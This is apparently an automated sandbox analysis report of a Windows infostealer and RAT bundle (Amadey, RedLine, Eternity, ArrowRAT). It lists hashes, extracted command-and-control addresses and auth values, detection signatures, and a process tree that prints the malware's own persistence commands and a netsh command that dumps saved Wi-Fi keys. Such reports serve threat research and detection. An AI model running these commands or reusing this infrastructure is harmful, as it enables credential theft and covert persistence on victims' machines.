amadey | 92e52593ee8f8df61c3565c2d6362f93ed86cdb8de36dd3b429cca0d8bbb9d17

Analysis

max time kernel
54s
max time network
152s
platform
windows10-2004_x64
resource
win10v2004-20220901-en
resource tags

arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system
submitted
12/11/2022, 04:02

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

file.exe
Size

252KB
MD5

39808bfa3daffbdef158f0d26b955586
SHA1

c38fe5bd0cf9115bb1d588f2ed682b0fb0aa6922
SHA256

92e52593ee8f8df61c3565c2d6362f93ed86cdb8de36dd3b429cca0d8bbb9d17
SHA512

8d5e2aca03dbe6e1e251705e7ba4b537c98af1df3c248c71df2d617aac26759c15bd9edf4cd14e03de02127c04bbd6f7b28cacd81162738606df0df6553c546d
SSDEEP

6144:XZA8BS2lL0+IHD5YbkKPU0sz8nvJ7STLTx5mhajaSo:XZA8B94+IH9YbkavE9Aa

Score

10^/10

amadey arrowrat eternity redline @noxycloud @redlinevip cloud (tg: @fatherofcarders)client collection discovery infostealer persistence rat spyware stealer trojan

Malware Config

Extracted

Family

eternity

http://eternityms33k74r7iuuxfda4sqsiei3o3lbtr5cpalf6f4skszpruad.onion

Extracted

Family

redline

Botnet

@REDLINEVIP Cloud (TG: @FATHEROFCARDERS)

151.80.89.233:13553

Attributes

auth_value
fbee175162920530e6bf470c8003fa1a

Extracted

Family

redline

Botnet

@NoxyCloud

85.192.63.57:34210

Attributes

auth_value
20dc074852db65a2b74addf964cf576e

Extracted

Family

arrowrat

Botnet

Client

213.239.219.58:1337

Mutex

nPxRArUjc

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey
ArrowRat
Remote access tool with various capabilities first seen in late 2021.
rat arrowrat

Detect Amadey credential stealer module 4 IoCs

resource	yara_rule
behavioral2/files/0x0001000000022e46-278.dat	amadey_cred_module
behavioral2/files/0x0001000000022e46-279.dat	amadey_cred_module
behavioral2/files/0x0001000000022e4a-293.dat	amadey_cred_module
behavioral2/files/0x0001000000022e4a-291.dat	amadey_cred_module

Eternity
Eternity Project is a malware kit offering an info stealer, clipper, worm, coin miner, ransomware, and DDoS bot.
eternity
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 4 IoCs

resource	yara_rule
behavioral2/files/0x0001000000022e1e-172.dat	family_redline
behavioral2/files/0x0001000000022e1e-173.dat	family_redline
behavioral2/memory/3900-174-0x0000000000150000-0x0000000000178000-memory.dmp	family_redline
behavioral2/memory/4192-268-0x0000000000400000-0x0000000000428000-memory.dmp	family_redline

Downloads MZ/PE file

Executes dropped EXE 11 IoCs

pid	Process
2392	rovwer.exe
4632	lego.exe
636	rovwer.exe
4804	stub.exe
3900	20K.exe
4200	becr.exe
3208	MRH.exe
3000	ROR.exe
1884	blockchainlzt_crypted.exe
3940	Quoko tace wesa.exe
3104	rovwer.exe

Checks computer location settings 2 TTPs 5 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	rovwer.exe
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	lego.exe
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	rovwer.exe
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	MRH.exe
Key value queried	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation	file.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	stub.exe
Key opened	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	stub.exe
Key opened	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	stub.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 5 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\blockchainlzt_crypted.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000038001\\blockchainlzt_crypted.exe"	rovwer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\lego.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000004001\\lego.exe"	rovwer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\stub.exe = "C:\\Users\\Admin\\AppData\\Roaming\\1000020000\\stub.exe"	rovwer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\20K.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000027001\\20K.exe"	rovwer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\becr.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000032001\\becr.exe"	rovwer.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
22	ip-api.com

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 4200 set thread context of 1684	4200	becr.exe	116
PID 1884 set thread context of 3932	1884	blockchainlzt_crypted.exe	122
PID 3000 set thread context of 4192	3000	ROR.exe	137

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
3936	3544	WerFault.exe	76

Checks processor information in registry 2 TTPs 4 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0	stub.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	stub.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	AcroRd32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	AcroRd32.exe

Creates scheduled task(s) 1 TTPs 3 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
3140	schtasks.exe
1456	schtasks.exe
3344	schtasks.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION	AcroRd32.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings	InstallUtil.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
4144	PING.EXE

Suspicious behavior: EnumeratesProcesses 50 IoCs

pid	Process
4804	stub.exe
3900	20K.exe
3900	20K.exe
3208	MRH.exe
3208	MRH.exe
3208	MRH.exe
3208	MRH.exe
3208	MRH.exe
3208	MRH.exe
3208	MRH.exe
3208	MRH.exe
3208	MRH.exe
3208	MRH.exe
3000	ROR.exe
3000	ROR.exe
3000	ROR.exe
3000	ROR.exe
3000	ROR.exe
3000	ROR.exe
3000	ROR.exe
3000	ROR.exe
3000	ROR.exe
3000	ROR.exe
3504	AcroRd32.exe
3504	AcroRd32.exe
3504	AcroRd32.exe
3504	AcroRd32.exe
3504	AcroRd32.exe
3504	AcroRd32.exe
3504	AcroRd32.exe
3504	AcroRd32.exe
3504	AcroRd32.exe
3504	AcroRd32.exe
3504	AcroRd32.exe
3504	AcroRd32.exe
3504	AcroRd32.exe
3504	AcroRd32.exe
3504	AcroRd32.exe
3504	AcroRd32.exe
3940	Quoko tace wesa.exe
3940	Quoko tace wesa.exe
3940	Quoko tace wesa.exe
3940	Quoko tace wesa.exe
3940	Quoko tace wesa.exe
3940	Quoko tace wesa.exe
3940	Quoko tace wesa.exe
3940	Quoko tace wesa.exe
3940	Quoko tace wesa.exe
3940	Quoko tace wesa.exe
4192	InstallUtil.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	4804	stub.exe
Token: SeDebugPrivilege	3900	20K.exe
Token: SeDebugPrivilege	4192	InstallUtil.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
3504	AcroRd32.exe

Suspicious use of SetWindowsHookEx 6 IoCs

pid	Process
1684	InstallUtil.exe
3504	AcroRd32.exe
3504	AcroRd32.exe
3504	AcroRd32.exe
3504	AcroRd32.exe
3504	AcroRd32.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3544 wrote to memory of 2392	3544	file.exe	80
PID 3544 wrote to memory of 2392	3544	file.exe	80
PID 3544 wrote to memory of 2392	3544	file.exe	80
PID 2392 wrote to memory of 3140	2392	rovwer.exe	85
PID 2392 wrote to memory of 3140	2392	rovwer.exe	85
PID 2392 wrote to memory of 3140	2392	rovwer.exe	85
PID 2392 wrote to memory of 4632	2392	rovwer.exe	88
PID 2392 wrote to memory of 4632	2392	rovwer.exe	88
PID 2392 wrote to memory of 4632	2392	rovwer.exe	88
PID 4632 wrote to memory of 636	4632	lego.exe	89
PID 4632 wrote to memory of 636	4632	lego.exe	89
PID 4632 wrote to memory of 636	4632	lego.exe	89
PID 636 wrote to memory of 1456	636	rovwer.exe	90
PID 636 wrote to memory of 1456	636	rovwer.exe	90
PID 636 wrote to memory of 1456	636	rovwer.exe	90
PID 636 wrote to memory of 5016	636	rovwer.exe	92
PID 636 wrote to memory of 5016	636	rovwer.exe	92
PID 636 wrote to memory of 5016	636	rovwer.exe	92
PID 5016 wrote to memory of 2064	5016	cmd.exe	94
PID 5016 wrote to memory of 2064	5016	cmd.exe	94
PID 5016 wrote to memory of 2064	5016	cmd.exe	94
PID 5016 wrote to memory of 3876	5016	cmd.exe	95
PID 5016 wrote to memory of 3876	5016	cmd.exe	95
PID 5016 wrote to memory of 3876	5016	cmd.exe	95
PID 5016 wrote to memory of 312	5016	cmd.exe	96
PID 5016 wrote to memory of 312	5016	cmd.exe	96
PID 5016 wrote to memory of 312	5016	cmd.exe	96
PID 5016 wrote to memory of 3492	5016	cmd.exe	97
PID 5016 wrote to memory of 3492	5016	cmd.exe	97
PID 5016 wrote to memory of 3492	5016	cmd.exe	97
PID 5016 wrote to memory of 4180	5016	cmd.exe	98
PID 5016 wrote to memory of 4180	5016	cmd.exe	98
PID 5016 wrote to memory of 4180	5016	cmd.exe	98
PID 5016 wrote to memory of 4340	5016	cmd.exe	99
PID 5016 wrote to memory of 4340	5016	cmd.exe	99
PID 5016 wrote to memory of 4340	5016	cmd.exe	99
PID 636 wrote to memory of 4804	636	rovwer.exe	101
PID 636 wrote to memory of 4804	636	rovwer.exe	101
PID 4804 wrote to memory of 4648	4804	stub.exe	102
PID 4804 wrote to memory of 4648	4804	stub.exe	102
PID 4648 wrote to memory of 4940	4648	cmd.exe	105
PID 4648 wrote to memory of 4940	4648	cmd.exe	105
PID 4648 wrote to memory of 4568	4648	cmd.exe	107
PID 4648 wrote to memory of 4568	4648	cmd.exe	107
PID 4648 wrote to memory of 4064	4648	cmd.exe	108
PID 4648 wrote to memory of 4064	4648	cmd.exe	108
PID 4804 wrote to memory of 2404	4804	stub.exe	109
PID 4804 wrote to memory of 2404	4804	stub.exe	109
PID 2404 wrote to memory of 4768	2404	cmd.exe	111
PID 2404 wrote to memory of 4768	2404	cmd.exe	111
PID 2404 wrote to memory of 4152	2404	cmd.exe	112
PID 2404 wrote to memory of 4152	2404	cmd.exe	112
PID 2404 wrote to memory of 1280	2404	cmd.exe	113
PID 2404 wrote to memory of 1280	2404	cmd.exe	113
PID 636 wrote to memory of 3900	636	rovwer.exe	114
PID 636 wrote to memory of 3900	636	rovwer.exe	114
PID 636 wrote to memory of 3900	636	rovwer.exe	114
PID 636 wrote to memory of 4200	636	rovwer.exe	115
PID 636 wrote to memory of 4200	636	rovwer.exe	115
PID 4200 wrote to memory of 1684	4200	becr.exe	116
PID 4200 wrote to memory of 1684	4200	becr.exe	116
PID 4200 wrote to memory of 1684	4200	becr.exe	116
PID 4200 wrote to memory of 1684	4200	becr.exe	116
PID 4200 wrote to memory of 1684	4200	becr.exe	116

outlook_office_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	stub.exe

outlook_win_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	stub.exe

C:\Users\Admin\AppData\Local\Temp\file.exe
"C:\Users\Admin\AppData\Local\Temp\file.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3544
- C:\Users\Admin\AppData\Local\Temp\50c1695437\rovwer.exe
  "C:\Users\Admin\AppData\Local\Temp\50c1695437\rovwer.exe"
  2⤵
  - Executes dropped EXE
  - Checks computer location settings
  - Adds Run key to start application
  - Suspicious use of WriteProcessMemory
  PID:2392
- - C:\Windows\SysWOW64\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN rovwer.exe /TR "C:\Users\Admin\AppData\Local\Temp\50c1695437\rovwer.exe" /F
    3⤵
    - Creates scheduled task(s)
    PID:3140
- - C:\Users\Admin\AppData\Local\Temp\1000004001\lego.exe
    "C:\Users\Admin\AppData\Local\Temp\1000004001\lego.exe"
    3⤵
    - Executes dropped EXE
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory
    PID:4632
  - - C:\Users\Admin\AppData\Local\Temp\99e342142d\rovwer.exe
      "C:\Users\Admin\AppData\Local\Temp\99e342142d\rovwer.exe"
      4⤵
      Executes dropped EXE
      Checks computer location settings
      Adds Run key to start application
      Suspicious use of WriteProcessMemory
      PID:636
    - - C:\Windows\SysWOW64\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN rovwer.exe /TR "C:\Users\Admin\AppData\Local\Temp\99e342142d\rovwer.exe" /F
        5⤵
        Creates scheduled task(s)
        
        PID:1456
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "rovwer.exe" /P "Admin:N"&&CACLS "rovwer.exe" /P "Admin:R" /E&&echo Y|CACLS "..\99e342142d" /P "Admin:N"&&CACLS "..\99e342142d" /P "Admin:R" /E&&Exit
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:5016
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        6⤵
        
        PID:2064
      - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "rovwer.exe" /P "Admin:N"
        6⤵
        
        PID:3876
      - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "rovwer.exe" /P "Admin:R" /E
        6⤵
        
        PID:312
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        6⤵
        
        PID:3492
      - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "..\99e342142d" /P "Admin:N"
        6⤵
        
        PID:4180
      - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "..\99e342142d" /P "Admin:R" /E
        6⤵
        
        PID:4340
    - - C:\Users\Admin\AppData\Roaming\1000020000\stub.exe
        
        "C:\Users\Admin\AppData\Roaming\1000020000\stub.exe"
        5⤵
        Executes dropped EXE
        Accesses Microsoft Outlook profiles
        Checks processor information in registry
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        outlook_office_path
        outlook_win_path
        
        PID:4804
      - C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:4648
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        7⤵
        
        PID:4940
        
        C:\Windows\system32\netsh.exe
        
        netsh wlan show profile
        7⤵
        
        PID:4568
        
        C:\Windows\system32\findstr.exe
        
        findstr All
        7⤵
        
        PID:4064
      - C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /C chcp 65001 && netsh wlan show profile name="65001" key=clear | findstr Key
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:2404
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        7⤵
        
        PID:4768
        
        C:\Windows\system32\netsh.exe
        
        netsh wlan show profile name="65001" key=clear
        7⤵
        
        PID:4152
        
        C:\Windows\system32\findstr.exe
        
        findstr Key
        7⤵
        
        PID:1280
    - - C:\Users\Admin\AppData\Local\Temp\1000027001\20K.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000027001\20K.exe"
        5⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3900
    - - C:\Users\Admin\AppData\Local\Temp\1000032001\becr.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000032001\becr.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of WriteProcessMemory
        
        PID:4200
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
        6⤵
        Modifies registry class
        Suspicious use of SetWindowsHookEx
        
        PID:1684
        
        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\Invoice.pdf"
        7⤵
        Checks processor information in registry
        Modifies Internet Explorer settings
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        Suspicious use of SetWindowsHookEx
        
        PID:3504
        
        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
        8⤵
        
        PID:652
        
        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=D929DE824B5E8519D7BA3303395ED76E --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=1 --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=D929DE824B5E8519D7BA3303395ED76E --renderer-client-id=2 --mojo-platform-channel-handle=1692 --allow-no-sandbox-job /prefetch:1
        9⤵
        
        PID:2644
        
        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=A1D72E3A2B9283309C85B8FB3BFF2CDE --mojo-platform-channel-handle=1908 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
        9⤵
        
        PID:2424
        
        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=7135E6B9E34C6E38EF1912007D6EF525 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=1 --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=7135E6B9E34C6E38EF1912007D6EF525 --renderer-client-id=4 --mojo-platform-channel-handle=2140 --allow-no-sandbox-job /prefetch:1
        9⤵
        
        PID:2172
        
        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=15AEAFD2829BCD3D318916275E202CFB --mojo-platform-channel-handle=2556 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
        9⤵
        
        PID:4152
        
        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=608E5BC88227479EE35ED09E5E528EE3 --mojo-platform-channel-handle=2768 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
        9⤵
        
        PID:4764
        
        C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
        
        "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=E271DC67EA9C99BFCC0282D05B6C757D --mojo-platform-channel-handle=2720 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
